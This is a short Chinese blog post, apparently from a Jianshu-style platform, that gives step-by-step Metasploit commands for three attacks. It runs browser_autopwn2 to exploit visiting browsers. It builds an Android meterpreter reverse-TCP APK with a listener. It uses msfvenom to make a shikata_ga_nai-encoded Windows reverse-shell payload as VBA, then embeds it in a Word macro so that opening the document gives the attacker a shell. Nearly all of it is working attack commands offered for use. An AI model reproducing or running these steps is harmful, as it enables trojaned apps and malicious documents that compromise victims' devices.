浏览器、安卓、VBScript

auxiliary/server/browser_autopwn2模块

msf > use auxiliary/server/browser_autopwn2

msf auxiliary(browser_autopwn2) > set srvport 80

msf auxiliary(browser_autopwn2) > set uripath /

msf auxiliary(browser_autopwn2) > exploit

通过浏览器,去访问http://192.168.80.163/

msf > kill 0  关闭时,只需要kill 0


生成安卓apk

msf > use payload/android/meterpreter/reverse_tcp

msf payload(reverse_tcp) > set lhost 192.168.80.163

msf payload(reverse_tcp) > generate -p android -f a.apk -t raw


msf exploit(handler) > set payload android/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.80.163

msf exploit(handler) > exploit

在手机上安装a.apk文件。


VBScript感染方式

root@kali:~# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.80.163 LPORT=4444 -e x86/shikata_ga_nai -f vba-exe

生成2部分内容:①VBA代码 ②十六进制的payload

利用过程:

第一部分粘入VBA代码(视图--宏--创建)

第二部分粘入word文档正文

打开word文档,MSF会获得目标主机的shell。

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • 一、MSF终端命令 show exploits 列出metasploit框架中所有的渗透攻击模块 show pay...
    Kaen阅读 3,370评论 0 1
  • 一 漏洞及漏洞发掘方法 漏洞,是指在硬件、软件、协议实现或系统安全策略上存在缺陷,攻击者能够在未授权的情况下对系统...
    kaitoulee阅读 15,408评论 0 30
  • 环境:kali Linux 开启msf: msfconsole 生成apk木马:msfvenom -p andro...
    红色火苗阅读 3,311评论 0 1
  • 基础命令概览: back(返回): 从目前的情况下向后移动 banner:Display an a...
    i轻阅读 18,697评论 0 6
  • 1、沟通止于责难。有效的沟通没有对错之分。解决问题之道必须考虑到每个人的立场,永远都有共赢的解决方案。 2、所有沟...
    懒懒的妈阅读 435评论 0 1